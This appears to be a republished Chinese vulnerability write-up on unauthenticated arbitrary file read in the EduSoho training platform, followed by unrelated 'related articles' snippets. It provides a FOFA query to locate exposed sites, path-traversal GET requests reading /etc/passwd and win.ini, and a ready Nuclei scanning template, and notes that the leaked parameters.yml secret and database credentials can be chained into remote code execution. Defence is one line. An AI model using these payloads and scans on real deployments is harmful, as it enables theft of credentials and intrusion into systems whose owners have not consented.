【漏洞复现】EduSoho教培系统 任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:

 
  1. title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")

【产品界面】

【漏洞复现】

【poc】

linux系统:

 
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
  2. Host: 127.0.0.1


windows系统:

 
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
  2. Host: 127.0.0.1

【Nuclei-Poc】

 
  1. id: EduSoho_arbitrary_file_read_crossplatform
  2. info:
  3. name: EduSoho Cross-Platform Directory Traversal Vulnerability
  4. author: yourname
  5. severity: critical
  6. description:
  7. tags: directory-traversal,cve,critical
  8. requests:
  9. - method: GET
  10. path:
  11. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
  12. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
  13. matchers-condition: and
  14. matchers:
  15. - type: word
  16. part: body
  17. words:
  18. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
  19. - "[extensions]" # Windows systems
  20. condition: or
  21. - type: status
  22. status:
  23. - 200
  24. - type: word
  25. part: body
  26. negative: true
  27. words:
  28. - "empty file"
  29. condition: and
  30. - type: word
  31. part: body
  32. negative: true
  33. words:
  34. - "\"success\": 0"
  35. condition: and

【验证】

.\nuclei -l 1.txt -t 4.yaml

【修复建议】

1:更新到最新版本

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/666733.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

NIO Selector简介

1.Selector和Channel关系 Selector一般称为选择器&#xff0c;也叫多路复用器&#xff0c;NIO的核心组件&#xff0c;用于检查一个或多个Channel的状态是否处于可读、可写的状态。 2.可选择通道 &#xff08;1&#xff09;不是所有的channel都能被selector复用&#xff0c;…

LDRA Testbed软件静态分析_Jenkins持续集成_(2)配置邮件自动发送静态分析结果

系列文章目录 LDRA Testbed软件静态分析_操作指南 LDRA Testbed软件静态分析_自动提取静态分析数据生成文档 LDRA Testbed软件静态分析_Jenkins持续集成_(1)自动进行静态分析的环境搭建 LDRA Testbed软件静态分析_Jenkins持续集成_(2)配置邮件自动发送静态分析结果 LDRA Testb…

【劳德巴赫 Trace32 高阶系列 5 -- Trace32 JTAG Data.Load 与 Data.Save】

请阅读【Trace32 高阶系列 专栏导读】 文章目录 Data.Load.binaryData.SAVE.BinaryData.Load.binary 用于将二进制文件加载到目标系统的内存中。 Format: Data.LOAD.Binary <file> <address> | <range> [/<option>] <option>: SKIP <of…

基于python+控制台输出的学生信息管理系统

基于python控制台输出的学生信息管理系统 一、系统介绍二、效果展示三、其他系统实现四、获取源码 一、系统介绍 打印功能菜单、添加学生信息、删除学生信息、修改学生信息、显示学生信息、退出系统&#xff0c;并且需要接收用户的输入&#xff0c;在根据输入内容调用相应函数…

理解进程的一些知识准备

1. 认识冯诺依曼体系结构 计算机有很多的体系结构&#xff0c;但到如今&#xff0c;冯诺依曼体系结构变成了主流。 输入设备&#xff1a;话筒、键盘、摄像头、鼠标、磁盘、网卡… 输出设备&#xff1a;声卡、显示器、打印机、显卡、网卡、磁盘… 有的设备既能作为输入设备又能…

多播路由选择

目录 1 多播路由选择 1.1 转发多播数据报时使用三种方法 (1) 洪泛与剪除 RPB 的要点&#xff1a; 1.检查&#xff0c;转发 2.形成以源为根节点的多播转发树 3.剪枝与嫁接 (2) 隧道技术 (tunneling) (3) 基于核心的发现技术 1.2 几种多播路由选择协议 1 多播路由选择 …

docker 构建个人博客网站

1、项目地址 https://gitee.com/hhll/blog-hangliang.git 2、打包docker镜像并上传docker hub 【1】注册docker hub账号https://hub.docker.com/ 【2】在docker hub建对应的仓库 【3】登录docker hub并打包上传前后端镜像 sudo docker login -u xxxx 密码 xxxxxx 后端&am…

视频业务像素、带宽、存储空间计算

一、像素和分辨率 分辨率的单位通常是像素&#xff08;或点&#xff09;&#xff0c;用水平像素数乘以垂直像素数来表示。例如&#xff0c;一个分辨率为1920 x 1080的屏幕有1920个水平像素和1080个垂直像素。 总像素分辨率公式运算 例如 1920 x 10802073600总约200万 500W≈…

OpenCV学习记录——特征匹配

文章目录 前言一、暴力匹配步骤分析二、代码分析 前言 特征匹配是一种图像处理技术&#xff0c;用于在不同图像之间寻找相似的特征点&#xff0c;并将它们进行匹配。特征匹配在计算机视觉和图像处理领域中具有广泛的应用&#xff0c;包括目标识别、图像拼接、三维重建等。 一、…

Makefile学习

C语言的编译过程 预处理&#xff08;Preprocessing&#xff09; -E是让编译器在预处理之后就退出&#xff0c;不进行后续编译过程&#xff1b;-o是指定输出文件名。 gcc -E hello.c -o hello.i编译&#xff08;Compilation&#xff09; 这里的编译不是指程序从源文件到二进制…

XUbuntu22.04之如何创建、切换多个工作区(二百零九)

简介&#xff1a; CSDN博客专家&#xff0c;专注Android/Linux系统&#xff0c;分享多mic语音方案、音视频、编解码等技术&#xff0c;与大家一起成长&#xff01; 优质专栏&#xff1a;Audio工程师进阶系列【原创干货持续更新中……】&#x1f680; 优质专栏&#xff1a;多媒…

Android简单支持项目符号的EditText

一、背景及样式效果 因项目需要&#xff0c;需要文本编辑时&#xff0c;支持项目符号&#xff08;无序列表&#xff09;尝试了BulletSpan&#xff0c;但不是很理想&#xff0c;并且考虑到影响老版本回显等因素&#xff0c;最终决定自定义一个BulletEditText。 先看效果&…

异步解耦之RabbitMQ(二)_RabbitMQ架构及交换机

异步解耦之RabbitMQ(一)-CSDN博客 RabbitMQ架构 RabbitMQ是一个基于AMQP&#xff08;Advanced Message Queuing Protocol&#xff09;协议的消息代理中间件&#xff0c;它通过交换机和队列实现消息的路由和分发。以下是RabbitMQ的架构图&#xff1a; Producer&#xff08;生产…

NAS系统折腾记 – Emby搭建家庭多媒体服务器

Emby简介 Emby是一款优秀的媒体服务器软件&#xff0c;致力于为用户提供丰富的多媒体体验。通过Emby&#xff0c;您可以方便地在家庭内的各种设备上观看您喜爱的电影、电视剧和其他视频内容。而且&#xff0c;Emby还具备强大的媒体管理功能&#xff0c;让您的影视资源井然有序…

Win10系统给文件夹添加备注

在Win10系统中&#xff0c;相信大多用户都没有看到过文件或者是文件夹上有备注信息。下面给大家分享下在Win10系统中给文件夹或文件添加备注的方法。在添加备注之前&#xff0c;首先我们要在需要显示备注的文件夹中显示“备注”标签&#xff0c;否则就算我们给某个文件夹添加了…

如何确定python包的依赖关系

要确定哪些包依赖于 pyee&#xff0c;你可以使用 pip show 命令来查看特定包的详细信息&#xff0c;其中包括其依赖关系。 你可以执行以下命令来查看哪些包依赖于 pyee&#xff1a; sqlCopy code pip show pyee 这会显示与 pyee 包相关的详细信息&#xff0c;包括其版本、安…

nginx 的 ngx_http_upstream_dynamic_module 动态域名解析功能的使用和源码详解

tengine ngx_http_upstream_dynamic_module 动态域名解析功能的代码详细解析 1. 为什么需要域名动态解析2. 配置指令3. 加载模块3. 源码分析3.1 指令解析3.2 upstream负载均衡算法的初始化3.3 upstream负载均衡上下文的初始化3.4 获取upstream的服务器地址3.5 域名解析回调处理…

BAPI_PRODORD_CREATE-创建生产订单BAPI测试

目录 实现过程和笔记完整程序 实现过程和笔记 完整程序 *&---------------------------------------------------------------------* *& Report z_test_bapi_prodord_create_lhy *&---------------------------------------------------------------------* *&am…

【Java万花筒】Java图形库探秘:创意编程、数据可视化与用户界面设计

图形化未来&#xff1a;Java图形库全面解析与应用指南 前言 在Java开发的世界中&#xff0c;图形处理一直是一个关键领域&#xff0c;涉及从创意编程到数据可视化再到用户界面设计的多个方面。本文将深入探讨几个领域内颇具代表性的Java图形库&#xff0c;为开发者提供了解和…

广州产业园神秘顾客考察指标有哪些

随着经济的发展和产业结构的升级&#xff0c;产业园在推动区域经济增长中的地位日益凸显。为了确保产业园的持续发展与竞争力&#xff0c;对其进行神秘顾客考察显得尤为重要。产业园神秘顾客考察包括以下几点&#xff1a; 一、基础设施建设 交通便捷性&#xff1a;评估产业园…